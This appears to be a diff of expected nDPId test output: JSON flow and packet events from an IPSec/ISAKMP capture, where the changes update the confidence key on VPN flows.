+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":955,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":956,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQw\/QAAPcREutt7bvDwKgCZAH0KQQAPDt0h60nd4XOo4EAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFWSjMix2hDw5Uoh9iWqg=="} 01514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":957,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946763527783,"pkt":"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\/+YRhQU1yMpmQB5bWydw9ZfvTkPXAog0gKlZ1KQAAJIVS0Rg+btu6BkuEgsgaurW3aJ4eaYYGQ6VjkOvvz6QMKQAAHAAAQASo5HDOkRKoIfuPc\/+LezYZYFoAhAAAABwAAEAFi9H7SlG8iBMVMxjPqyusPgxIUYI="} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":56312,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":291,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":139412,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":33856,"flow_avg_l4_payload_len":564,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":8164,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":32620,"flow_avg_l4_payload_len":543,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763512920,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":11496,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":51444,"flow_avg_l4_payload_len":480,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":11496,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":7664,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763512822,"flow_last_seen":946763512882,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1108,"flow_tot_l4_payload_len":6692,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":2206,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1156,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":2206,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":56312,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":291,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":139412,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":33856,"flow_avg_l4_payload_len":564,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":8164,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":32620,"flow_avg_l4_payload_len":543,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763512920,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":11496,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":51444,"flow_avg_l4_payload_len":480,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":11496,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 